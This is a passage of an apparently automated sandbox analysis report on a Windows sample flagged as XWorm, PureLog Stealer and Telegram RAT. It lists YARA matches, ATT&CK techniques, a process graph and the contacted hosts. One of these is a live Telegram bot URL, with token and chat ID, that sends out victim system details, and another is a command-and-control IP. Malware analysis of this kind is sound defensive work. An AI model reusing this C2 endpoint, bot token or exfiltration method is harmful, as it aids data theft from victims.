                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\file.exeQueries volume information: C:\Users\user\AppData\Roaming\file.exe VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\file.exeQueries volume information: C:\Users\user\AppData\Roaming\file.exe VolumeInformation
                            Source: C:\Users\user\WindowsUpdaterConf.exeQueries volume information: C:\Users\user\WindowsUpdaterConf.exe VolumeInformation
                            Source: C:\Users\user\WindowsUpdaterConf.exeQueries volume information: C:\Users\user\WindowsUpdaterConf.exe VolumeInformation
                            Source: C:\Users\user\WindowsUpdaterConf.exeQueries volume information: C:\Users\user\WindowsUpdaterConf.exe VolumeInformation
                            Source: C:\Users\user\WindowsUpdaterConf.exeQueries volume information: C:\Users\user\WindowsUpdaterConf.exe VolumeInformation
                            Source: C:\Users\user\WindowsUpdaterConf.exeQueries volume information: C:\Users\user\WindowsUpdaterConf.exe VolumeInformation
                            Source: C:\Users\user\WindowsUpdaterConf.exeQueries volume information: C:\Users\user\WindowsUpdaterConf.exe VolumeInformation
                            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: Amcache.hve.29.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                            Source: Amcache.hve.29.drBinary or memory string: msmpeng.exe
                            Source: Amcache.hve.29.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                            Source: Amcache.hve.29.drBinary or memory string: MsMpEng.exe
                            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: file.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.2.file.exe.5e50000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.file.exe.5e50000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 43.2.WindowsUpdaterConf.exe.42d42a0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.file.exe.c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.1759365253.0000000005E50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.1694062530.0000000000C32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000002B.00000002.4172310149.00000000042F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\WindowsUpdaterConf.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\file.exe, type: DROPPED
                            Yara detected Telegram RAT
                            Source: Yara matchFile source: 0.2.file.exe.3719ccc.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.file.exe.372e50c.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.file.exe.372e50c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.file.exe.3719ccc.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: file.exe PID: 6596, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: file.exe PID: 2852, type: MEMORYSTR
                            Yara detected XWorm
                            Source: Yara matchFile source: 0.2.file.exe.3719ccc.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.file.exe.372e50c.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.file.exe.372e50c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.file.exe.3719ccc.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000002.4176352782.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: file.exe PID: 6596, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: file.exe PID: 2852, type: MEMORYSTR
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                            Remote Access Functionality

                            barindex
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: file.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.2.file.exe.5e50000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.file.exe.5e50000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 43.2.WindowsUpdaterConf.exe.42d42a0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.file.exe.c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.1759365253.0000000005E50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.1694062530.0000000000C32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000002B.00000002.4172310149.00000000042F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\WindowsUpdaterConf.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\file.exe, type: DROPPED
                            Yara detected Telegram RAT
                            Source: Yara matchFile source: 0.2.file.exe.3719ccc.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.file.exe.372e50c.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.file.exe.372e50c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.file.exe.3719ccc.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: file.exe PID: 6596, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: file.exe PID: 2852, type: MEMORYSTR
                            Yara detected XWorm
                            Source: Yara matchFile source: 0.2.file.exe.3719ccc.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.file.exe.372e50c.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.file.exe.372e50c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.file.exe.3719ccc.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000002.4176352782.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: file.exe PID: 6596, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: file.exe PID: 2852, type: MEMORYSTR
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                            Windows Management Instrumentation                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		11
                            Disable or Modify Tools                            		OS Credential Dumping1
                            File and Directory Discovery                            		Remote Services11
                            Archive Collected Data                            		1
                            Web Service                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Scheduled Task/Job                            		1
                            Scheduled Task/Job                            		111
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory23
                            System Information Discovery                            		Remote Desktop ProtocolData from Removable Media1
                            Ingress Tool Transfer                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            PowerShell                            		221
                            Registry Run Keys / Startup Folder                            		1
                            Scheduled Task/Job                            		11
                            Obfuscated Files or Information                            		Security Account Manager541
                            Security Software Discovery                            		SMB/Windows Admin SharesData from Network Shared Drive11
                            Encrypted Channel                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook221
                            Registry Run Keys / Startup Folder                            		2
                            Software Packing                            		NTDS1
                            Process Discovery                            		Distributed Component Object ModelInput Capture1
                            Non-Standard Port                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            DLL Side-Loading                            		LSA Secrets151
                            Virtualization/Sandbox Evasion                            		SSHKeylogging2
                            Non-Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
                            Masquerading                            		Cached Domain Credentials1
                            Application Window Discovery                            		VNCGUI Input Capture13
                            Application Layer Protocol                            		Data Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                            Virtualization/Sandbox Evasion                            		DCSync1
                            System Network Configuration Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                            Process Injection                            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569488 Sample: file.exe Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 78 api.telegram.org 2->78 80 ip-api.com 2->80 88 Suricata IDS alerts for network traffic 2->88 90 Found malware configuration 2->90 92 Malicious sample detected (through community Yara rule) 2->92 96 14 other signatures 2->96 10 file.exe 1 5 2->10         started        14 file.exe 2->14         started        16 WindowsUpdaterConf.exe 2->16         started        18 5 other processes 2->18 signatures3 94 Uses the Telegram API (likely for C&C communication) 78->94 process4 file5 72 C:\Users\user\AppData\Roaming\file.exe, PE32 10->72 dropped 74 C:\Users\user\...\file.exe:Zone.Identifier, ASCII 10->74 dropped 76 C:\Users\user\AppData\Local\...\file.exe.log, CSV 10->76 dropped 108 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 10->108 110 Creates autostart registry keys with suspicious names 10->110 112 Creates multiple autostart registry keys 10->112 118 6 other signatures 10->118 20 file.exe 16 6 10->20         started        25 cmd.exe 1 10->25         started        114 Multi AV Scanner detection for dropped file 14->114 116 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->116 27 WerFault.exe 14->27         started        29 WerFault.exe 16->29         started        31 WerFault.exe 18->31         started        33 WerFault.exe 18->33         started        35 WerFault.exe 18->35         started        37 WerFault.exe 18->37         started        signatures6 process7 dnsIp8 82 185.196.8.239, 49742, 7000 SIMPLECARRER2IT Switzerland 20->82 84 ip-api.com 208.95.112.1, 49730, 80 TUT-ASUS United States 20->84 86 api.telegram.org 149.154.167.220, 443, 49740 TELEGRAMRU United Kingdom 20->86 66 C:\Users\user\WindowsUpdaterConf.exe, PE32 20->66 dropped 98 Protects its processes via BreakOnTermination flag 20->98 100 Creates multiple autostart registry keys 20->100 102 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 20->102 104 Adds a directory exclusion to Windows Defender 20->104 39 powershell.exe 23 20->39         started        42 powershell.exe 23 20->42         started        44 powershell.exe 20->44         started        50 3 other processes 20->50 46 conhost.exe 25->46         started        48 timeout.exe 1 25->48         started        68 C:\ProgramData\Microsoft\...\Report.wer, Unicode 27->68 dropped 70 C:\ProgramData\Microsoft\...\Report.wer, Unicode 31->70 dropped file9 signatures10 process11 signatures12 106 Loading BitLocker PowerShell Module 39->106 52 conhost.exe 39->52         started        54 conhost.exe 42->54         started        56 conhost.exe 44->56         started        58 WindowsUpdaterConf.exe 50->58         started        60 conhost.exe 50->60         started        62 conhost.exe 50->62         started        process13 process14 64 WerFault.exe 58->64         started       

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            file.exe47%ReversingLabsByteCode-MSIL.Backdoor.njRAT
                            file.exe100%AviraTR/Dropper.Gen7
                            file.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Roaming\file.exe47%ReversingLabsByteCode-MSIL.Backdoor.njRAT
                            C:\Users\user\WindowsUpdaterConf.exe47%ReversingLabsByteCode-MSIL.Backdoor.njRAT

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://www.microsoft.(0%Avira URL Cloudsafe
                            185.196.8.2390%Avira URL Cloudsafe
                            http://crl.microsoft/0%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            ip-api.com
                            		208.95.112.1
                            		truefalse
                              		high
                              api.telegram.org
                              		149.154.167.220
                              		truefalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://api.telegram.org/bot8070077125:AAEdRIyp1anHye9Y0jcV8uNF6U4mmijN8Pk/sendMessage?chat_id=1818813749&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4C67EC226C1C2FB3C434%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20YD8OYZ2%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6false
                                  		high
                                  185.196.8.239true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://ip-api.com/line/?fields=hostingfalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.1809974233.0000000005958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1866493773.0000000005DA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1941064108.0000000005688000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2027132554.00000000056F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000014.00000002.1996515359.00000000047E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.org/botfile.exe, 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.1803745466.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1848689030.0000000004E96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1915480182.0000000004776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1996515359.00000000047E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.microsoftpowershell.exe, 00000006.00000002.1816364705.00000000074A9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1875270222.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1875270222.00000000087C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000014.00000002.1996515359.00000000047E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://aka.ms/pscore6lBfqpowershell.exe, 00000006.00000002.1803745466.00000000048F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1848689030.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1915480182.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1996515359.0000000004691000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.1803745466.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1848689030.0000000004E96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1915480182.0000000004776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1996515359.00000000047E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/powershell.exe, 00000014.00000002.2027132554.00000000056F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
